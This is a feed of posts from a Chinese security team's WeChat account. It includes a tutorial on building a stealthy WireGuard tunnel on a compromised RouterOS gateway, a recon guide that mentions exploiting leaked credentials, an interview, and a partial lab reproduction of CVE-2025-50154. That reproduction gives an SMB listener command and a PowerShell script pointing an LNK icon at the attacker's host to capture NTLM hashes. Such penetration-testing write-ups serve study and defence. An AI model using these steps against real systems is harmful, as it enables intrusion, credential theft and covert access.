渊龙Sec安全团队

通过RouterOS建立WireGuard内网隧道

Tue, 31 Mar 2026 18:19:00 +0800

原创 AabyssZG 2026-03-31 18:19 广东

让我们跟随曾哥的脚步，深入学习通过RouterOS建立WireGuard内网隧道，从而快速进入目标内网进行深层渗透！

微信公众号：渊龙Sec安全团队
为国之安全而奋斗，为信息安全而发声！
如有问题或建议，请在公众号后台留言
如果你觉得本文对你有帮助，欢迎在文章底部赞赏我们

0# 概述

在近期的实战渗透过程中，当我通过历史密码泄露或者爆破成功进入RouterOS系统后台后，应该如何搭建隧道进入目标内网，就成为了实际渗透过程中的问题。

title.jpg

RouterOS是一种路由操作系统，是基于Linux核心开发，兼容x86 PC的路由软件，通过该软件可以把标准PC电脑变成专业路由器，RouterOS软件的开发和应用不断的更新和发展，软件经历了多次更新和改进，其功能在不断增强和完善。特别在无线、认证、策略路由、带宽控制和防火墙过滤等功能上有着非常突出的功能，其极高的性价比，受到许多网络人士的青睐。

1.png

在日常针对内网渗透和外部打点的过程中，RouterOS是常见的网关系统和边缘资产，由于其部署方便且易用性较高，在非常多的企业级应用场景中能看到它的身影。

3.png

1# WireGuard功能介绍

WireGuard 是一个易于配置、快速且安全的开源 VPN程序。旨在获得比IPsec和OpenVPN更好的性能，后两者都是常见的隧道协议。WireGuard协议的流量经由UDP传输，它可以轻松地在树莓派这类低端设备到高端服务器上部署。

IPsec 和 OpenVPN 等大多数其他解决方案是几十年前开发的。安全研究人员和内核开发人员 Jason Donenfeld 意识到它们速度慢且难以正确配置和管理，这让他创建了一个新的开源 VPN 协议和解决方案，它更加快速、安全、易于部署和管理。

2.png

WireGuard 最初是为 Linux 开发的，但现在可用于 Windows、macOS、BSD、iOS 和 Android，它仍在活跃开发中。

而上文提到的RouterOS路由操作系统，刚好支持创建和使用WireGuard VPN！这就能让我们能快速的配置WireGuard并连接VPN快速的进入对应的内网，实现跨网段访问内网敏感资源并进一步实施深度内网渗透的目的。

2# 内网渗透整体思路

常见开放端口分布情况：

RouterOS路由操作系统的Webfig服务默认端口为HTTP协议的80端口，常见的还有88端口和8088端口，在实战的时候可以尝试测绘一下这几个端口。
而WireGuard VPN的默认端口是51820，采用 UDP 协议进行通信，在实战的时候可以尝试测绘一这个端口。

通过搜索引擎进行检索，发现互联网上已经有不少前辈写过如何配置WireGuard，但根据那些文章的步骤，要么找不到具体功能点在哪，要么是配置完成后无法正常连接VPN，于是便有写这篇文章的想法。

通过80端口访问Web，并输入账户密码进入后台后，找到IP功能点，点击Addresses，可以看到已经配置的IP地址，其中ether1是RouterOS路由操作系统分配的公网IP，而LAN是RouterOS路由操作系统管理的内网办公网段：

10.png

我们的目的是要通过建立WireGuard VPN，访问192.168.1.1/24这个网段，从而拿到关键运维机器的权限或者突破网段隔离，具体路径思维导图如下：

11.png

3# 配置WireGuard-服务端

那我们先要在服务端建一个WireGuard服务，在Web界面找到WireGuard功能点：

4.png

点击WireGuard功能点，找到WireGuard标签页，点击Add New：

5.png

在弹出的新界面中，Comment随便填（相当于昵称），然后Listen Port填的就是WireGuard的监听端口，我这里填的是5120，然后点击Apply：

6.png

点击完Apply后，会发现系统自动生成了Private Key和Public Key，也就是私钥和公钥，这里要将Public Key复制记录下来，而Private Key则不需要记录，记录完后点击OK：

7.png

我们还要建一个IP段，用来给WireGuard VPN来分配虚拟IP，找到IP功能点，点击Addresses，点击Add New，在弹出的新界面中，Address填写10.1.1.1/24，Network填写10.1.1.1，在Interface这里选择之前创建的WireGuard（如果有多个的话需要选择对应的选项，默认是wireguard1），然后点击OK：

13.png

12.png

接下来再回到WireGuard功能点，找到Peers标签页，点击Add New：

8.png

在弹出的新界面中，Comment随便填（相当于昵称），在Interface这里选择之前创建的WireGuard（如果有多个的话需要选择对应的选项，默认是wireguard1），将上面拿到的Public Key填入，Endpoint Port就和前面填的一样写5120，Allowed Address填10.1.1.1/24和192.168.1.1/24（分别是我们VPN分配的虚拟网段和目标核心网网段），其他选择auto即可，Client DNS如果内网有DNS服务器则填内网的DNS地址，如果没有就填1.1.1.1或者其他公共DNS服务器即可，然后点击OK：

9.png

保存后，在Peers标签页会多一行，双击即可查看详情，拉到最下面会看到有个配置文件内容，将其复制下来：

14.png

4# 配置WireGuard-客户端

在官网下载WireGuard的客户端，地址为https://www.wireguard.com/install/，选择自己的系统版本进行安装即可，然后打开WireGuard客户端，将之前获取的配置文件粘贴上去，注意以下内容：

删掉ListenPort这一行
Address改为自己设置的虚拟IP端，且不能和自己的网关冲突（比如我之前设置10.1.1.1/24，那这里就得写10.1.1.2/24）
新增Endpoint行，内容为服务器IP:监听端口（我前面设置的是5120）
名称随便填即可

15.png

点击保存后，可以看到界面内已经有个标签页，点击连接：

16.png

弹出消息显示连接成功，且界面中流量有变化，然后我们ping内网的虚拟网关能通，说明之前的配置都是正确的：

17.png

18.png

19.png

5# 配置WireGuard-防火墙

但当我们尝试通过WireGuard VPN去连接192.168.1.1/24的网段时候，发现并不通，这是怎么回事呢？

20.png

因为RouterOS内置了防火墙，我们需要将WireGuard进行放行，才能和内网其他地址段进行通联。

重新打开服务端网页，找到右上角的Terminal，即可进入命令行配置界面：

21.png

5.1 开启防火墙放行 (Forward 链)

RouterOS默认可能会拦截非 LAN 接口发起的转发请求，以下这条规则用于允许来自 WireGuard 的流量进入 LAN 接口：

1/ip firewall filter
2add action=accept chain=forward in-interface=all-wireguard out-interface=LAN comment="WireGuardToLAN"

注：如果只有一个WireGuard接口，写具体的接口名（如wireguard1）也可以。

5.2 开启NAT Masquerade

可能还需要解决“回程路由”问题，以下这条规则用于让内网机器以为请求是路由器发的，从而能正常回包：

1/ip firewall nat
2add action=masquerade chain=srcnat src-address=10.1.1.1/24out-interface=LAN comment="WireGuardNAT"

注意：请将 10.1.1.1/24 替换为你给 WireGuard 客户端分配的虚拟 IP 段。

5.3 检查Peer是否填写AllowedIPs

回到服务端，找到WireGuard功能点，找到Peers标签页：

AllowedIPs 必须包含：192.168.1.1/24和10.1.1.1/24（分别是我们VPN分配的虚拟网段和目标核心网网段）

做完以上三步之后，再去测试能否访问核心IP网段192.168.1.1/24，就会发现能够成功访问到了。

6# 总结

通过本文，我们能从0开始，了解并熟悉如何架设WireGuard VPN，并成功以此连接到内网环境，实现跨网段和深度内网渗透，同时使用该手段建立的内网隧道流量特征不明显，无文件落地，且在边缘网关主机当中运行，具有较高的隐蔽性和内网通信权限，有较高的渗透利用价值。

本文所有内容军来自于实战环境，且互联网相关资料多为残缺状态，本文具有重要的参考价值，同时也感谢各位师傅的关注和支持！

如果师傅们还有一些骚姿势，可以在评论区秀出来，也可以和我友好交流哈哈~

我是曾哥，我在渊龙Sec安全团队等你
微信公众号：渊龙Sec安全团队
欢迎关注我，一起学习，一起进步~
本篇文章为团队成员原创文章，请不要擅自盗取！

阅读原文

跳转微信打开

2026 POLARIS CTF 震撼来袭！

Fri, 20 Mar 2026 14:03:00 +0800

渊龙Sec安全团队 2026-03-20 14:03 广东

很高兴能收到星盟安全团队的邀请，渊龙Sec安全团队成为2026 POLARIS CTF的黄金赞助商！[鼓掌]

2026年3月28日 — 2026年3月30日，面向全国网络安全爱好者开放报名，不限年龄、不限专业、不限学历，目前火热报名中！[嘿哈]

『我们的征途是星辰大海』[加油]

比赛介绍：首届 PolarisCTF 招新赛正式启幕

比赛平台：polarisctf.play.ctfplus.cn

报名网址：https://www.ctfplus.cn/competition/hall?competitionId=2031260122948308992

愿你在网络安全这条漫长而闪耀的路上，眼里有光，心中有火，脚下有路，身边有友！

跳转微信打开

渊龙Sec安全团队祝您元旦快乐！

Thu, 01 Jan 2026 21:51:25 +0800

渊龙Sec安全团队广东

新的一年，是新的开始[鼓掌]

感谢各位师傅一直以来的关注，欢迎各位师傅前来互相交流、共同进步[坏笑]

谨代表渊龙Sec安全团队，祝大家在新的一年平安顺遂、技术精进、马到成功！[抱拳][抱拳][抱拳]

为国之安全而奋斗，为信息安全而发声！[加油]

跳转微信打开

信息搜集之边缘资产和隐形资产的发掘

Sun, 07 Dec 2025 13:50:00 +0800

原创渊龙Sec安全团队 2025-12-07 13:50 广东

常规的漏洞原理和利用都捻熟于心，但为什么往往挖不到漏洞呢？第一个就是实战的经验比较少，对于漏洞在哪出现，有什么手法还掌握的不多；第二个是信息搜集没有得到要领，只会僵硬的进行信息搜集，对于边缘资产和隐形资产的发掘没有经验

0# 概述

一眨眼的时间，马上就要过年了，不知道大家今年都过得如何？

近期有不少师傅在抖音咨询我，问我说：常规的漏洞原理和利用都捻熟于心，但是为什么在SRC挖掘和攻防中，往往就是挖不到漏洞呢？

我给了两点回复：第一个就是实战的经验比较少，对于漏洞在哪出现，有什么手法还掌握的不多；第二个是信息搜集没有得到要领，只会僵硬的进行信息搜集，对于边缘资产和隐形资产的发掘没有经验。

今天咋们就来好好唠唠这个“边缘资产和隐形资产的发掘”，为什么它在攻防场景下如此重要？

注：今日本篇主要的重心在于如何在攻防当中更快发掘脆弱资产，从而实现GetShell，并不关注XSS/逻辑漏洞这种漏洞。

1# 什么是边缘资产和隐形资产？

在攻防中，整个攻击链路大致为七步：信息搜集/漏洞利用/建立据点/权限提升/权限维持/横向移动/痕迹清除。其中每一步都是承上启下，没有上一步就做不了下一步。

而整个攻击链的开头-信息搜集就尤为重要，其实我一直觉得信息搜集是渗透测试中最简单的部分，也是渗透测试中最难的部分。渗透测试的本质是信息搜集，一个优雅、成熟的攻击者，一定是在信息搜集中拥有“灵敏嗅觉”的猎人。

在渗透测试的过程中，收集到目标的信息越多，渗透切入点就越多，对目标渗透的成功率也就越高。

而我们纵观信息资产的时候，我们往往会发现，如果我们能找到目标最短的那块“短板”，就使得渗透测试更能成功，而这块“短板”往往不在正面，通常出现在侧面或者背面，这就意味着通过正面的资产信息搜集，往往是无法搞定目标的。其实你从企业安全负责人的角度来说，去做暴露面收敛和边界安全的时候，一定是先做完正面资产（主域名下的所有子域名以及正式服务器）的架构梳理及风险排查，那攻击者去打主域名基本也是一无所获的状态。

这就意味着，对于边缘资产和隐形资产的发掘，才是渗透测试信息搜集的重点。那什么是是边缘资产和隐形资产呢？

边缘域名资产：域名非主域名（可能是具体业务组或者全资子公司在用）
隐形IP资产：以IP形式提供服务（无法通过域名找到，可能是开发测试遗漏或者内部人员使用的系统）
隐形C段资产：目标持有该C段内一部分或者全部公网IP，开放提供具体业务服务
关联性：一定是企业的边缘业务平台，具有目标相关的具体特征

2# 针对边缘域名资产的收集

2.1 找到目标旗下所有的备案域名

通过爱企查、企查查平台查询：所有备案域名、所有微信公众号、所有微信小程序

通常我们说去挖腾讯相关的漏洞，首先想法肯定是去看看qq.com，但是先别急，把旗下备案资产全拉出来，会发现有很多自己都没见过的备案域名，那这些域名可以多去关注一手，肯定比正面的主域名要更好出漏洞

2.2 边缘子域名

测绘SSL证书（挖SRC也有效）：https://crt.sh

适用于补齐子域名缺失，以及找到一些多层级的子域名系统

2.3 小程序漏洞挖掘

微信小程序抓包（新的域名==>查看是否为供应商==>大概率没有WAF）

通过企查查平台能更快找到企业旗下小程序，通过抓包可以尝试对小程序进行渗透测试

如何抓包可以看我之前的文章：https://blog.zgsec.cn/archives/278.html

同样，因为小程序架构的原因，基本不存在WAF，可以尝试通过联动Xray的联动自动挖掘漏洞：https://docs.xray.cool/tools/xray/advanced/burp

3# 针对隐形IP资产的收集

3.1 常规测绘语句

通过HTML正文包含的ICP备案号进行查询：body="京ICP备05049539号" && country="CN"
通过企业的Icon图标来进行资产测绘

3.2 非常规测绘语句

【关键点】林业局、工商局、农业农村局、学校？？怎么测绘边缘资产？

重点在于，要根据目标的具体业务熟悉，联想关键词进行Fuzz测绘：林业管理、树木管理、城市规划、招商平台、融资平台、智慧农村、智慧基建、智慧城市、交通管控、智慧交通、智慧校园、智慧课堂、学习平台、学生管理、党建平台、宣发平台、入学系统、学业平台、智慧入学、校园卡、学院系统、智慧就业、智慧社区、社区管理

重点：首先要打哪个地方的资产，要限定资产的省份/城市：因为一般除了云上资产（CDN等），资产所属IP都在该省/市的范围内

根据关键词进行省份内测绘：

(region="浙江") and (title="智慧农村")
(region="浙江") and (title="智慧校园")
(region="浙江") and (title="学生管理")

根据关键词进行管理平台测绘（适合想不到合适业务关键词）：

(region="浙江") and (title="校园登录")
(region="浙江") and (title="xx管理平台")
(region="浙江") and (title="xx管理")

根据关键词进行文件上传接口测绘：

(region="浙江") and (body="/upload") and (title="智慧农村")
(region="浙江") and (body="/upload") and (title="智慧政务")
(region="浙江") and (body="/upload") and (title="入学")

批量导出==>查看相关的网页Title==>筛选出一批比较符合的资产==>手动验证

这一块本身是有很多实战案例的，可惜签了保密协议，很多都不能放出来，就不放出实例了

且如果这项技能熟能生巧，会有很大的威胁性，想学习或者有疑问的师傅可以私下找我咨询

4# 针对隐形C段资产的收集

4.1 真实源站C段测绘

备案域名==>IP指向C段==>确定是否为CDN（微步查询）==>不是CDN，直接打C段（确认是否为公司资产）

通过ARL的C段功能，可以点击IP降序排列，能很清晰看到域名解析IP有多少指向同一个C段，该C段涉及多少个域名，如果涉及IP和涉及域名都很多，就是重点C段资产

如果想要部署ARL的师傅可以看我们这个项目：https://github.com/Aabyss-Team/ARL

可以看到，目标IP存在有效合法证书，可以用于验证该IP归属具有强关联性

通过这个方法，基本确定该C段为该目标企业的真实C段，可以直接去测试该C段开放的服务是否存在漏洞

4.2 历史源站C段测绘

对于一个网站的开发，特别是大型网站的制作，其实需要很长的一个过程。在一些网站刚开始搭建的时候，为了调试方便和测试选项，是不会套CDN和负载均衡进行上线测试的，这个时候可能就会被记录到历史解析IP，我们就能通过查询历史解析IP看看是否为真实源站IP或者业务公网IP。

工具地址（需要代理才能访问）：https://securitytrails.com

当然，对于这个测绘的操作，一定要认真验证，因为很有可能找到的IP及C段可能目标已经不再用了，要结合Fofa测绘结果来做综合研判处理！

5# 针对敏感信息泄露的搜集

5.1 Github开源项目信息泄露

具体可以看我以前写的文章，这里就不再赘述：https://blog.zgsec.cn/archives/205.html

5.2 网页敏感信息泄露

通过搜索引擎进行搜索：目标域名/名称默认密码

通过这些方法，可以通过开源情报（OSINT）找到许多学号、工号和默认密码

5.3 历史账号密码泄露

历史账号密码泄露是由许多原因造成的，如历史上遭遇黑客攻击导致数据泄露，又如遭到病毒、木马攻击导致浏览器内凭据被窃取等等

可以在海外频道获得一些泄露，也有许多频道已经被封禁：

里面基本是一行一条，包含网站URL，账号及密码，还有许多隐秘渠道可以获得质量较高的泄露，但本文暂不能透露，这个行为是及其危险的！

我们通过多方渠道积累了2TB的TXT泄露凭据记录，通过实战遍历搜索，可以找到不少大型企业和单位的入口账号成功登录！通过这个能拿到一些后台权限，危害是极大的，企业安全人员应该关注自己企业在暗网的凭据泄露。

6# 总结

本文围绕“边缘资产和隐形资产的发掘”主体，深入讲解了边缘域名资产、隐形IP资产、隐形C段资产三种资产的发掘和梳理过程，都是干货，学吧！

同时感谢各位师傅的关注和支持，觉得不错欢迎给本文点个赞，如有问题或者学习需求，可以私聊本人交流学习哈哈！

我是曾哥，我在渊龙Sec安全团队等你
微信公众号：渊龙Sec安全团队
欢迎关注我，一起学习，一起进步~
本篇文章为团队成员原创文章，请不要擅自盗取！

阅读原文

跳转微信打开

专访开源布道者曾哥：云端砺剑，开源传灯【T00ls人物专访第十八期】

Fri, 24 Oct 2025 20:37:00 +0800

2025-10-24 20:37 广东

大家好，我叫曾哥，英文ID为AabyssZG。目前是渊龙Sec安全团队创始人、国际云安全联盟渗透测试工作组成员、i春秋安全论坛签约作家。

哈哈哈，笔者也是上T00ls人物专访啦~ T00ls作为老牌安全社区，非常值得大家去交流学习，欢迎大家关注T00ls安全公众号！

自我介绍

大家好，我叫曾哥，英文ID为AabyssZG。

目前是渊龙Sec安全团队创始人、国际云安全联盟渗透测试工作组成员、i春秋安全论坛签约作家。专注于红蓝攻防、威胁情报和云安全等方向，参与多场国家级、省市级攻防并斩获佳绩，获得华商银行等多家单位表扬信，如今在一线威胁情报方向发光发热。

还在腾讯安全沙龙及互联网安全大会等多个安全会议上发表议题，成为国内多个安全专刊的初版编辑，并参与翻译了云安全基石丛书《云攻击向量》。

目前我还是一名开源爱好者，在Github开源并贡献了一些代码，如SpringBoot-Scan、HaE及WebShell-Bypass-Guide，欢迎大家前来提交PR和交流学习！

先来让我们看看朋友们对他的看法

资深安全专家——胡珀（lakehu）

是一个热爱网络安全行业、对安全技术有追求、有技术功底、有探索精神的年轻人。

腾讯云鼎实验室攻防负责人——李鑫

最早认识曾哥是在推特上，那会经常看他分享一些情报和安全技术，后来因为某个云安全问题聊到了一起，逐渐熟悉起来。曾哥是个很纯粹的技术同学，为人谦逊随和，在攻防实战领域积淀深厚，且乐于分享，他运营的技术社区氛围很不错。曾两次邀请他坐客腾讯安全沙龙，现实中的曾哥憨厚朴实，技术话题之外言辞不多，人很Nice。

慢雾科技创始人——余弦

线下见过曾哥，印象很好，印象中是个靠谱实在且有些腼腆的安全人员。线上的印象会更多些，是个愿意分享网络安全有关知识的人，行业如果少了分享那就太无趣了。

顺丰科技成文实验室安全研究员——观沧海

曾哥有着远超同龄人的成熟与技术深度，他对网安之术与道的不倦追求，造就了他今日之成就。他日常抛出的技术问题，不仅与一线实战深度结合，也对底层理论有很高要求，表现了其不凡的技术功底。毫无疑问，他是行业内升起的一颗新星。在闪耀之余，也引领了许多小伙伴一同成长。

HaE作者/凌驭空间安全团队创始人——EvilChen

结识曾哥源于开源安全项目。他年纪轻轻，却带着一股难得的“初代黑客”的影子：积极推动和开发优质项目，并为之进行技术生态建设与传播，让好项目被更多人看见、用上。一篇“一场跨越十年的超时空思维碰撞”让我看见他潜心钻研技术，乐于分享，认真参与开源社区。他是真正有热情、有担当的网络安全开源践行者。

接下来让我们通过几个问题，了解曾哥的技术之路

能否请您分享一下您是什么时候开始接触网络安全的？当时是出于什么契机或兴趣？

曾哥：最开始我是在初高中开始对计算机感兴趣，也非常感谢父母的支持，能让我学习各种编程课程，让我能有一个比较不错的基础。

本来我对未来的打算是作为一名网络管理员或者程序员，后续准备深入学习桌面开发和一些应用级程序开发。

转机来自于我高中的时候，当时还很年轻，涉世未深。某位群友在QQ群里上传了“超级工具箱APP”，我就想看看是什么东西，结果安装打开后就导致手机被植入勒索病毒，所有的图片和文档都被加密，解密需要交200块钱。

当时给我气的啊，于是就开始研究APK的反编译，去找到关键的密码实现模块，找出密码解密了数据。

后来就发现网络安全很刺激，也感觉适合我，便开始在这个行业里面学习和深入。

至于现在我为什么选择云安全，因为我作为一名站长，很早便发现了云计算对于业务的价值和技术的便捷，从而进一步看到了云上安全的机遇和挑战，于是便选择深入研究和学习云安全方向，想在这个分支领域找到价值所在。

您的学习渠道主要有哪些？在学习过程中，有没有哪些资源或平台对您帮助特别大？

曾哥：经过多年的学习，我日常会浏览海内外的安全论坛和安全博客，能够通过最新的一些帖子了解到新的攻防技术和前沿能力，为此我将自己常看的很多网站都做到我们团队导航https://dh.aabyss.cn当中，也希望能给其他师傅带来便利。

同时我还建立了不少优秀社群，在社群中与各种大佬一对一沟通，也能学习到不少顶级的思路和技术方向。

我最开始学习的时候，与T00ls论坛的宗旨“低调求发展 - 潜心习安全” 不谋而合。

便一直想尝试加入T00ls论坛，中间还申请过好几次才通过，其中的历练也让我逐渐成长起来。

我认为T00ls这种技术投稿制是非常不错的，能够磨练和考验个人的技术实力，同时也能筛掉浮躁的脚本小子和投机者。

T00ls论坛内的内容也非常不错，我每天都会在频道里面看看有什么感兴趣的文章或者提出的点子。

其他优秀的平台也有很多，比如阿里先知安全平台，以及看雪安全论坛，知道创宇Paper社区，内容都非常扎实，日常阅读学习总能有很多收获。

当时创立渊龙Sec团队的初衷是什么，未来的发展方向是什么样的。

曾哥：其实刚创建渊龙Sec安全团队并没有什么远大抱负，当时圈子已经开始比较浮躁，我是非常不希望那种氛围。

我当时和T00ls的宗旨“低调求发展 - 潜心习安全”一样，准备潜心习安全去沉淀沉淀，与一些志同道合的朋友交流学习，后续发现大家在一起能干很多东西，能创造不少的价值，预算便将团队创立起来。

我们团队其实研究方向比较多哈哈，从最开始的红蓝攻防、CTF，到后面的无线电安全、云安全等等领域，因为刚开始大家也是因为兴趣在一起的哈哈。

日常的话，红蓝对抗方向上面的研究一直在做，包括我也将渗透方向的突破技巧和方法通过一些免费直播和博客文章对外分享，同时我们还有研究一些新兴领域，比如Web3安全和数据流动安全。

对于组建团队这个话题，我想多说几句：一支技术团队想要发展的长久，真正想做到行业级的团队，那就不能急躁。脚踏实地的一步步前行，只有用实际技术产出的能力，才能真正的创造价值。

靠“博眼球、发段子、赚大钱”成长起来的所谓“团队”，也只是过眼云烟，很快就会消逝在历史的长河之中了。

也许可以赚许多钱割很多韭菜，但注定无法做大、做长远、做牛逼。

看到您有很多开源的工具发布，在行业内优秀工具大部分都小范围流通的情况您有什么看法吗。未来有什么工具方面的计划吗。

曾哥：我在编写工具的过程中，有不少师傅前来提交贡献代码，我也会钻研学习他人的代码，受益颇多啊。

其实我对于工具的看法是：工具的作用就两点，一个是帮助你提升工作流效率，另一个是解决技术上的痛点难点。猪猪侠师傅之前提过一句话“聚焦问题，有效解决问题；不要做叼用没有的工具和产品”，这句话我是非常认同的，如果编写的工具没办法满足前面提出的任意一点，那就根本不是优秀工具。

那根据这个标准判定，其实会发现很多所谓大家追捧的工具算不上优秀工具。

只是套了个更好看的界面，或者看起来高大上，又或者无脑拼接缝合非常多工具，重点在于并没有解决实际的技术痛点难点，却获得了一众小白的追捧，收割了一众的韭菜，那我觉得这些工具是毫无意义的。

一款优秀的工具，凝聚了作者的技术精华和汗水，也代表作者当前的技术能力巅峰，开不开源的权利完全在于作者。

至于优秀工具在小范围流传，这个确实存在，我也拿到过一些优秀工具，观摩学习过不少厉害的技术解决方案。

优秀工具有诸多原因导致小范围流通，比如如免杀和攻击等方向，存在一定法律风险和技术风险，导致作者没选择开源，这种我认为是合理的。

不开源的坏处在于没办法看到源代码，别人没办法对功能和Bug进行优化。

需要提到，这些优秀工具的受众一定是被技术认可有实际需求的师傅，小白拿到这些工具也不知道该怎么用、在什么时候用、怎么合理使用。

我的建议是精进自己的技术，能够到这个技术层次上来和各位大佬交流，那自然就能拿到了。

同时我也鼓励大家将工具开源出来，觉得有风险不开源代码的话，也可以在T00ls等论坛写一下技术文章分享自己的技术思路，让大家一起来学习和成长，也能收获不少优质建议和代码贡献。

未来的话，我自身的工作还是比较繁忙的，技术对抗强度比较大，可能对于开源项目的维护会适当放缓。在适当的时候，我可能会开源云上攻防的一些工具，以及一些解决红蓝攻防当中苛刻环境的工具，目前这两块是写的比较多的。

现在很多企业开始重视云安全，你觉得这个领域目前最值得深挖的方向有哪些？

曾哥：从我的视角来看，我觉得可以深挖的方向一定是他人有所疏忽的地方，所以我选择了API 密钥泄露和供应链攻击这两个方向。

现在很多企业开始重视云安全，但在业务实际部署的过程中，往往会在 GitHub、Docker 镜像、日志文件中硬编码 API 密钥，导致被攻击者利用访问敏感的云资源；而开发者使用第三方 Docker 镜像、NPM / PyPI 等依赖时，也可能下载到恶意软件包，导致供应链投毒攻击，这两块我觉得值得深挖。

同时我觉得IAM权限管理是最重要也是最容易被忽视的，很多企业和业务在初期为了方便运维，通常将很多账号的权限开的非常大，后期又不去实施安全策略定期更换密码，也没有定期核查和治理相关的权限。导致突破一个用户账号使得云上资产被攻破，甚至整个域都被拿下的不在少数。

您对网络安全行业的未来发展充满信心吗？您认为新人在这个领域有哪些机会和挑战？

曾哥：先给出一个结论，我对网络安全行业的未来发展是有一定信心的。

正所谓“盛极必衰，衰极必盛”，不管是任何事物，在发展的过程中都是呈现周期性的，我认为网络安全行业依旧还有兴起的希望，目前网络安全行业仍在转型，转型中的阵痛大家都感受到了。

我在线下和不少大佬交流过这个问题，目前对于人才的需求还是存在的，基础人才有需求，但更需要很多高水平人才。

作为白帽子，不能浮躁，要沉得住气，坚守初心去努力磨砺自己的技术。

也可以尝试安全其他赛道上面的内容，去迎接更好的明天。从整体的角度来说，未来谁也不知道。

但从规律的角度来看，行业也会越来越规范，不可能一直差下去，要等行业的转型和契机。

新人机会的话，我一直在说网络安全并不只有传统的红蓝攻防，还有很多新兴赛道，比如云安全、区块链安全以及数据流动安全等方向，尝试去了解这些安全分支领域，看看适合不适合自己，再去深入学习和寻找机会，都是可行的。

网络安全的学习道路，很多时候都是孤身一人。实话说，学习网络安全是很辛苦的，要耐得住寂寞，能深耕于网络安全领域，对技术有自己的独立思考。每个人都有属于自己的道路，学习的路上，希望各位师傅能不忘初心、砥砺前行。

没必要追寻他人的脚步，做好自己、把握当下即可, 不过分自卑，也不过分自傲，努力进取，必有所成！

曾哥（AabyssZG），一位深耕云安全与威胁情报领域的青年技术新星。作为渊龙Sec安全团队创始人、国际云安全联盟渗透测试工作组成员，他兼具攻防实战经验与技术布道热情，在国家级攻防演练中屡获佳绩，并持续通过开源项目与技术文章推动行业知识共享。

他的安全之路始于高中时手机中毒的自救经历，从反编译APK成功解密的成就感中找到了技术使命感。早期受T00ls"低调求发展"理念影响，他形成了沉心钻研、务实求真的技术风格，至今保持每日阅读海外安全论坛的习惯，并将资源整合为团队导航站普惠同行。

在开源领域，他是SpringBoot-Scan等热门工具的作者，坚信"优秀工具必须提升效率或解决痛点"。面对行业浮躁，他始终坚持"不博眼球、不发段子、不割韭菜"的底线，带领团队在红蓝对抗、云安全、Web3等方向扎实深耕。

对于未来，他相信网络安全行业在经历阵痛后必将复兴，建议新人沉心打磨技术，关注云安全、区块链等新兴赛道。正如他所言："没必要追寻他人的脚步，做好自己、把握当下即可"——这位始终在代码与分享中找到乐趣的守夜人，正用属于自己的节奏，在云时代的安全长河中留下坚实印记。

欢迎搭建关注渊龙Sec安全团队公众号~

我是曾哥，我在渊龙Sec安全团队等你
微信公众号：渊龙Sec安全团队
欢迎关注我，一起学习，一起进步~
本篇文章为团队成员原创文章，请不要擅自盗取！

阅读原文

跳转微信打开

深度复现CVE-2025-50154获取NTLM哈希

Fri, 29 Aug 2025 17:36:00 +0800

原创渊龙Sec安全团队 2025-08-29 17:36 广东

让我们跟随N0va7师傅的脚步，从CVE-2025-24054一步一步Bypass从而复现CVE-2025-50154，一起来看看这个Windows的高危传奇漏洞~

1# 漏洞简介

该漏洞允许攻击者在没有任何用户交互的情况下提取 NTLM 哈希值，攻击者可以自动触发 NTLM 身份验证请求，从而实现离线破解或中继攻击以获得未经授权的访问。

NTLM 是 Microsoft 的一系列身份验证协议，用于确认用户身份和保护网络通信。它通过直接的客户端-服务器“质询/响应”过程工作，服务器发出质询，客户端证明其身份，而无需通过网络传输实际密码。

虽然 NTLMv2 受到保护，可以抵御彩虹表和传递哈希等预计算攻击，但捕获的哈希值仍然可以被利用。攻击者可能会尝试暴力破解它们离线或使用中继攻击，将窃取的哈希值传递给另一个服务以用户身份登录。如果被入侵的帐户具有提升的权限，这可能会很快导致权限升级和横向移动。

即使在 Microsoft 针对该问题进行补丁后，安全研究员也找到了一种绕过它并仍然获得 NTLM 哈希的方法，证明威胁并未完全消除，这就是CVE-2025-50154，而它之前的漏洞是CVE-2025-24054。

1.1 原文链接

https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/

2# 旧漏洞-CVE-2025-24054

2.1基础环境

Kali Linux
未打补丁的Windows 10

2.2复现

Kali Linux启动impacket渗透组件，开启一个 SMB 服务器来侦听传入的 SMB 连接

impacket-smbserver share . -smb2support

impacket-smbserver：为对应的impacket渗透组件
share .：指将当前目录作为share共享
smb2support：开启SMB服务支持

然后在受害机执行如下PowerShell脚本，新建一个PowerShell脚本文件1.ps1，写入如下内容（注意替换为自己的Kali Linux IP地址，此处我的Kali Linux IP地址为192.168.48.129）：

# lnk文件的地址，若要复现请替换为自己的地址$shortcutPath = "C:\Users\Divide\Desktop\lab.lnk"# 目标程序的路径$targetPath = "C:\Windows\System32\notepad.exe"# 指定快捷方式使用的图标文件（.ico）的位置为远程地址，此处为关键点，只有设置为远程地址，才能让他访问我们开启的SMB服务器$iconLocation = "\\192.168.48.129\share\icon.ico"# 创建一个 Windows Script Host Shell 对象（通过 COM 组件 WScript.Shell）。  # 这个对象提供了操作快捷方式、环境变量、执行程序等能力。  # 将该对象赋值给变量$wShell，后续通过它来创建和管理快捷方式。$wShell = New-Object -ComObject WScript.Shell# 如果该路径已存在快捷方式，则会覆盖；如果不存在，则创建一个新的快捷方式对象$shortcut = $wShell.CreateShortcut($shortcutPath)# 设置快捷方式的“目标”属性，即点击快捷方式时要启动的程序路径$shortcut.TargetPath = $targetPath# 这里使用的是远程网络路径中的 .ico 图标文件$shortcut.IconLocation = $iconLocation# 对快捷方式对象的修改保存到磁盘中$shortcut.Save()Write-Output "Shortcut created at: $shortcutPath"

将创建一个带有基于 SMB 的远程图标的 LNK（LNK就是快捷方式，带有一个图标）

运行它，通过查看资源管理器中的图标，我们将获得当前正在运行的用户打开 explorer.exe（资源管理器）进程的 NTLMv2-SSP 哈希值。

若PowerShell执行报错，执行如下命令输入y即可执行我们编写的PowerShell脚本

set-ExecutionPolicy RemoteSignedy

当运行成功后，结果如下，成功获取到对应用户的hash值：

2.3对应补丁以及漏洞信息

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054

2.3.1下载安装补丁

Win键+R键，输入winver查看对应的Windows版本

到网站下载补丁

点击即可下载

下载完直接放到对应机器双击安装即可

2.4 复测

打完补丁，之后再用上面这种方式无法拿到hash值了

3# Bypass-CVE-2025-50154

3.1 复现

前面的CVE-2025-24054打上对应补丁之后，通过下面的方式可以实现绕过补丁修复。还是先启动kali中的SMB服务：

impacket-smbserver share . -smb2support

